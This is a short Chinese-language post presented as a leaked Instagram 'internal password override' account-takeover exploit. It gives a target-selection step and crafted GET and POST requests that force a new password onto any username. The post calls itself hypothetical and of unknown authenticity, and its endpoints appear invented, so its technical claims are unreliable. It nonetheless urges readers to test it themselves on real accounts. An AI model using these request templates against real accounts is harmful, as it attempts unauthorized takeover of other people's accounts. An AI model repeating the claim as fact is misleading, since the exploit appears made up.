俄罗斯黑客流出,安全性和真实性未知,可自行测试。
漏洞别名:?day Auth Bypass / Internal Password Override 发现时间(假设):202X年某地下研究圈流传 影响范围:任意Instagram用户账户(包括商业/创作者账户) 漏洞类型:服务器端请求伪造 + 未授权内部端点访问 + 缺少二次验证 严重性:Critical(直接接管账户,无需用户交互)
核心原理(假设)
Instagram的账户恢复/密码管理后台有一个内部调试或遗留恢复页面(URL形如 https://www.instagram.com/internal/recovery/override?day=... 或类似路径),原本仅供Meta内部员工或特定自动化流程使用。 该页面在某些条件下(比如特定Header、Referer、Cookie、参数组合,或通过已认证但低权限的会话)缺少严格的权限校验,导致外部攻击者可以通过精心构造的请求直接提交新密码并强制覆盖目标账户。
典型利用流程(纯假设):
- 获取目标用户的Instagram用户名或关联的email/phone。
- 构造请求访问内部页面,例如:
text
GET /internal/account/password/force_change?username=target_user&day=internal_token_hash HTTP/1.1
Host: www.instagram.com
X-Instagram-AJAX: 1
X-IG-App-ID: 936619743392459
Cookie: sessionid=... (从任意已登录小号获取,或通过其他方式)
Referer: https://www.instagram.com/
- 如果页面响应200且包含表单或JSON成功标志,则直接POST新密码:
text
POST /internal/account/password/override HTTP/1.1
...
new_password=AttackerNewPass123!&confirm_password=AttackerNewPass123!